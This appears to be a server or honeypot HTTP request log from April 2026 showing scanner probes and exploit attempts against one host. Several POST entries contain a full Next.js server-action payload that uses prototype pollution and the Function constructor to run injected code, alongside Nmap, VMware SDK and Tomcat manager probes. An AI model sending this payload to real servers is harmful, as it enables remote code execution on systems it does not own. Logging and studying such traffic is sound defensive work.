RemoteAddr: 172.30.0.12:60800
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-04-04 10:10:24] === HTTP Request ===
[2026-04-04 10:09:54] Main page accessed - IP: 192.155.90.220:56584
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 192.155.90.220:56584
Path: /
URL: /
Method: GET
[2026-04-04 10:09:54] === HTTP Request ===
[2026-04-04 10:09:21] Main page accessed - IP: 89.110.97.157:49144
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Accept-Encoding: gzip
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 89.110.97.157:49144
Path: /
URL: /
Method: GET
[2026-04-04 10:09:21] === HTTP Request ===
===================
------WebKitFormBoundaryx1336481544064--
------WebKitFormBoundaryx1336481544064
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1336481544064
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 161999+true+8249937;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1336481544064
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1336481544064
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/134.0.6998.99 Mobile/15E148 Safari/604.1
X-Nextjs-Html-Request-Id: ilovepoop_1336481544064
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 522
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.26:48316
Path: /api/route
URL: /api/route
Method: POST
[2026-04-04 08:20:59] === HTTP Request ===
===================
------WebKitFormBoundaryx1963360123261--
------WebKitFormBoundaryx1963360123261
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1963360123261
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 262660+true+7474911;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1963360123261
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1963360123261
X-Nextjs-Request-Id: poop1234
Next-Action: x
Connection: close
X-Nextjs-Html-Request-Id: ilovepoop_1963360123261
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/134.0.6998.99 Mobile/15E148 Safari/604.1
Content-Length: 522
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.26:48312
Path: /app
URL: /app
Method: POST
[2026-04-04 08:20:58] === HTTP Request ===
===================
------WebKitFormBoundaryx739547180940--
------WebKitFormBoundaryx739547180940
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx739547180940
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 197099+true+3752161;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx739547180940
X-Nextjs-Html-Request-Id: ilovepoop_739547180940
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; he-il; NEO-X5-116A Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx739547180940
Next-Action: x
Connection: close
Content-Length: 518
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.26:48300
Path: /_next/server
URL: /_next/server
Method: POST
[2026-04-04 08:20:58] === HTTP Request ===
===================
------WebKitFormBoundaryx79967332537--
------WebKitFormBoundaryx79967332537
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx79967332537
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 29211+true+2737576;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx79967332537
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; he-il; NEO-X5-116A Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Content-Length: 513
X-Nextjs-Html-Request-Id: ilovepoop_79967332537
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx79967332537
X-Nextjs-Request-Id: poop1234
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.26:48296
Path: /api
URL: /api
Method: POST
[2026-04-04 08:20:57] === HTTP Request ===
===================
------WebKitFormBoundaryx168194458238--
------WebKitFormBoundaryx168194458238
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx168194458238
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 59029+true+2849353;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx168194458238
X-Nextjs-Html-Request-Id: ilovepoop_168194458238
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
Content-Length: 517
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx168194458238
X-Nextjs-Request-Id: poop1234
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.26:48292
Path: /_next
URL: /_next
Method: POST
[2026-04-04 08:20:57] === HTTP Request ===
[2026-04-04 08:20:56] Main page accessed - IP: 45.205.1.26:48282
===================
------WebKitFormBoundaryx698774137571--
------WebKitFormBoundaryx698774137571
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx698774137571
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 109286+true+6393995;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx698774137571
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx698774137571
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 518
X-Nextjs-Html-Request-Id: ilovepoop_698774137571
X-Nextjs-Request-Id: poop1234
Next-Action: x
User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; he-il; NEO-X5-116A Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.26:48282
Path: /
URL: /
Method: POST
[2026-04-04 08:20:56] === HTTP Request ===
[2026-04-04 07:56:58] Main page accessed - IP: 45.79.181.104:11742
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.79.181.104:11742
Path: /
URL: /
Method: GET
[2026-04-04 07:56:58] === HTTP Request ===
[2026-04-04 07:40:06] Main page accessed - IP: 138.197.16.14:46366
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/70.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 138.197.16.14:46366
Path: /
URL: /
Method: GET
[2026-04-04 07:40:06] === HTTP Request ===
[2026-04-04 07:23:50] Main page accessed - IP: 121.43.117.231:48058
===================
Protocol: HTTP/1.0
Host:
RemoteAddr: 121.43.117.231:48058
Path: /
URL: /
Method: GET
[2026-04-04 07:23:50] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 121.43.117.231:47402
Path: /HNAP1
URL: /HNAP1
Method: GET
[2026-04-04 07:23:37] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 121.43.117.231:47392
Path: /evox/about
URL: /evox/about
Method: GET
[2026-04-04 07:23:37] === HTTP Request ===
===================
Body: <soap:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Header><operationID>00000001-00000001</operationID></soap:Header><soap:Body><RetrieveServiceContent xmlns="urn:internalvim25"><_this xsi:type="ManagedObjectReference" type="ServiceInstance">ServiceInstance</_this></RetrieveServiceContent></soap:Body></soap:Envelope>
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
Content-Length: 441
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 121.43.117.231:47350
Path: /sdk
URL: /sdk
Method: POST
[2026-04-04 07:23:36] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 121.43.117.231:47352
Path: /nmaplowercheck1775287416
URL: /nmaplowercheck1775287416
Method: GET
[2026-04-04 07:23:36] === HTTP Request ===
[2026-04-04 07:23:36] Main page accessed - IP: 121.43.117.231:47346
===================
Protocol: HTTP/1.0
Host:
RemoteAddr: 121.43.117.231:47346
Path: /
URL: /
Method: GET
[2026-04-04 07:23:36] === HTTP Request ===
[2026-04-04 07:23:36] Main page accessed - IP: 121.43.117.231:47360
===================
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; mcafee-epo-agent)
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 121.43.117.231:47360
Path: /
URL: /
Method: GET
[2026-04-04 07:23:36] === HTTP Request ===
[2026-04-04 07:23:28] Main page accessed - IP: 121.43.117.231:46574
===================
Protocol: HTTP/1.0
Host:
RemoteAddr: 121.43.117.231:46574
Path: /
URL: /
Method: GET
[2026-04-04 07:23:28] === HTTP Request ===
[2026-04-04 07:12:01] Main page accessed - IP: 35.233.42.65:39918
===================
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: python-requests/2.32.5
Connection: keep-alive
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 35.233.42.65:39918
Path: /
URL: /
Method: GET
[2026-04-04 07:12:01] === HTTP Request ===
===================
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Connection: keep-alive
Accept-Encoding: gzip, deflate, gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
Accept-Language: en US,en;q=0.9,sv;q=0.8
X-Requested-With: XMLHttpRequest
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 5.61.209.107:11692
Path: /SDK/webLanguage
URL: /SDK/webLanguage
Method: GET
[2026-04-04 06:19:48] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.13:19354
Path: /overview
URL: /overview
Method: GET
[2026-04-04 05:43:26] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:33668
Path: /jars
URL: /jars
Method: GET
[2026-04-04 04:46:32] === HTTP Request ===
[2026-04-04 04:34:57] Main page accessed - IP: 45.79.8.221:45911
===================
Accept: */*
User-Agent: Mozilla/5.0 zgrab/0.x
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 45.79.8.221:45911
Path: /
URL: /
Method: GET
[2026-04-04 04:34:57] === HTTP Request ===
[2026-04-04 01:49:20] Main page accessed - IP: 45.91.64.6:56432
===================
Accept: */*
User-Agent: nook browser/1.0
Headers:
Protocol: HTTP/1.0
Host:
RemoteAddr: 45.91.64.6:56432
Path: /
URL: /
Method: GET
[2026-04-04 01:49:20] === HTTP Request ===
[2026-04-04 01:02:07] Main page accessed - IP: 194.88.98.82:34838
===================
Connection: close
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; Infrawatch/1.0; +https://infrawat.ch/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 194.88.98.82:34838
Path: /
URL: /
Method: GET
[2026-04-04 01:02:07] === HTTP Request ===
===================
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14931
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 163.5.180.142:44646
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-04-03 23:55:07] === HTTP Request ===
===================
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14931
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 163.5.180.142:44640
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-04-03 23:55:07] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14931
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 163.5.180.142:44638
Path: /nobody/favicon.ico
URL: /nobody/favicon.ico
Method: GET
[2026-04-03 23:55:07] === HTTP Request ===
===================
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14931
Connection: close
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 163.5.180.142:44622
Path: /login.rsp
URL: /login.rsp
Method: GET
[2026-04-03 23:55:07] === HTTP Request ===
===================
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14931
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 163.5.180.142:44608
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-04-03 23:55:07] === HTTP Request ===
===================
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14931
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 163.5.180.142:44592
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-04-03 23:55:07] === HTTP Request ===
===================
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14931
Connection: close
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 163.5.180.142:44590
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-04-03 23:55:07] === HTTP Request ===
===================
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14931
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 163.5.180.142:44580
Path: /image/lgbg.jpg
URL: /image/lgbg.jpg
Method: GET
[2026-04-03 23:55:07] === HTTP Request ===
===================
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14931
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 163.5.180.142:44566
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-04-03 23:55:07] === HTTP Request ===
===================
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14931
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 163.5.180.142:44550
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-04-03 23:55:07] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14931
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 163.5.180.142:44546
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-04-03 23:55:06] === HTTP Request ===
[2026-04-03 23:55:06] Main page accessed - IP: 163.5.180.142:44540
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14931
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 163.5.180.142:44540
Path: /
URL: /
Method: GET
[2026-04-03 23:55:06] === HTTP Request ===
===================
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14931
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 163.5.180.142:54384
Path: /skin/default_1/images/logo.png
URL: /skin/default_1/images/logo.png
Method: GET
[2026-04-03 23:55:05] === HTTP Request ===
[2026-04-03 23:05:20] Main page accessed - IP: 172.30.0.12:56772
===================
Accept-Encoding: identity
User-Agent: Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)
X-Forwarded-For: 54.195.7.75
Accept-Language: en-gb,en;q=0.5
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Via: 1.0 Caddy
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:56772
Path: /
URL: /
Method: GET
[2026-04-03 23:05:20] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 zgrab/0.x
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 135.237.126.218:50364
Path: /manager/text/list
URL: /manager/text/list
Method: GET
[2026-04-03 22:45:52] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; CyberOKInspect/1.0; +https://www.cyberok.ru/policy.html)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.142.100.136:57396
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-04-03 22:02:51] === HTTP Request ===
[2026-04-03 22:02:50] Main page accessed - IP: 85.142.100.136:57390
===================
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (compatible; CyberOKInspect/1.0; +https://www.cyberok.ru/policy.html)
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.142.100.136:57390
Path: /
URL: /
Method: GET
[2026-04-03 22:02:50] === HTTP Request ===
[2026-04-03 21:35:14] Main page accessed - IP: 185.247.137.20:45559
===================
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: livepoll.ru:8081
RemoteAddr: 185.247.137.20:45559
Path: /
URL: /
Method: GET
[2026-04-03 21:35:14] === HTTP Request ===
[2026-04-03 20:59:16] Main page accessed - IP: 198.235.24.204:61312
===================
Accept-Encoding: gzip
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 198.235.24.204:61312
Path: /
URL: /
Method: GET
[2026-04-03 20:59:16] === HTTP Request ===
===================
Accept-Language: en US,en;q=0.9,sv;q=0.8
Accept: */*
Accept-Encoding: gzip, deflate, gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 5.61.209.107:64416
Path: /SDK/webLanguage
URL: /SDK/webLanguage
Method: GET
[2026-04-03 19:42:22] === HTTP Request ===
[2026-04-03 19:40:17] Main page accessed - IP: 198.235.24.104:52428
===================
Accept: */*
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.0
Host:
RemoteAddr: 198.235.24.104:52428
Path: /
URL: /
Method: GET
[2026-04-03 19:40:17] === HTTP Request ===
[2026-04-03 18:49:10] Main page accessed - IP: 176.65.149.45:34032
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 176.65.149.45:34032
Path: /
URL: /
Method: GET
[2026-04-03 18:49:10] === HTTP Request ===
[2026-04-03 14:17:20] Login page accessed - IP: 111.123.41.235:51206
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 111.123.41.235:51206
Path: /login
URL: /login
Method: GET
[2026-04-03 14:17:20] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: proxy.flarevpn.digital:8080
RemoteAddr: 45.135.194.113:57004
Path: /judge
URL: http://proxy.flarevpn.digital:8080/judge
Method: GET
[2026-04-03 12:56:32] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Connection: close
Headers:
Protocol: HTTP/1.1
Host: proxy.flarevpn.digital:8080
RemoteAddr: 45.135.194.113:56996
Path: /judge
URL: http://proxy.flarevpn.digital:8080/judge
Method: GET
[2026-04-03 12:56:32] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: proxy.flarevpn.digital:8080
RemoteAddr: 45.135.194.113:56990
Path: /judge
URL: http://proxy.flarevpn.digital:8080/judge
Method: GET
[2026-04-03 12:56:32] === HTTP Request ===
===================
------WebKitFormBoundaryx44242670146--
------WebKitFormBoundaryx44242670146
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx44242670146
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 224085+true+197437;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx44242670146
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx44242670146
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.
Connection: close
Content-Length: 513
X-Nextjs-Html-Request-Id: ilovepoop_44242670146
X-Nextjs-Request-Id: poop1234
Next-Action: x
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.26:59264
Path: /api/route
URL: /api/route
Method: POST
[2026-04-03 12:21:03] === HTTP Request ===
===================
------WebKitFormBoundaryx646051246733--
------WebKitFormBoundaryx646051246733
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx646051246733
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 93356+true+6920297;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx646051246733
X-Nextjs-Html-Request-Id: ilovepoop_646051246733
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx646051246733
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; Android 9; AFTWMST22 Build/PS7233; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.152 Mobile Safari/537.36
Connection: close
Content-Length: 517
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.26:59258
Path: /app
URL: /app
Method: POST
[2026-04-03 12:21:03] === HTTP Request ===
===================
------WebKitFormBoundaryx305401449771--
------WebKitFormBoundaryx305401449771
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx305401449771
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 72647+true+4203910;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx305401449771
X-Nextjs-Html-Request-Id: ilovepoop_305401449771
X-Nextjs-Request-Id: poop1234
Next-Action: x
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Content-Length: 517
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx305401449771
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.26:59250
Path: /_next/server
URL: /_next/server
Method: POST
[2026-04-03 12:21:02] === HTTP Request ===
===================
------WebKitFormBoundaryx631928276986--
------WebKitFormBoundaryx631928276986
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx631928276986
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 94935+true+6656431;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx631928276986
X-Nextjs-Html-Request-Id: ilovepoop_631928276986
Accept-Encoding: gzip, deflate
